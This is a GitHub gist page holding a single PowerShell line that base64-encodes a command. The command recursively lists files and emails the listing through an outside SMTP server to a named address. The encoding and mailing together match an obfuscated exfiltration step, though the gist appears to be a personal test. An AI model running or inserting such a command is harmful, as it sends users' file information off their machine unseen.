Skip to content

Instantly share code, notes, and snippets.

@RC1140
Created October 14, 2010 15:00
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RC1140/626312 to your computer and use it in GitHub Desktop.
Save RC1140/626312 to your computer and use it in GitHub Desktop.
ConvertTo-Base64 -textToEncode '$PSEmailServer = "smtp.isdsl.net";$test = ls -recurse;Send-MailMessage -from "jameel@chasesoftware.co.za" -to "jameel@chasesoftware.co.za" -Subject "test" -Body [string]$test -BodyAsHtml'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment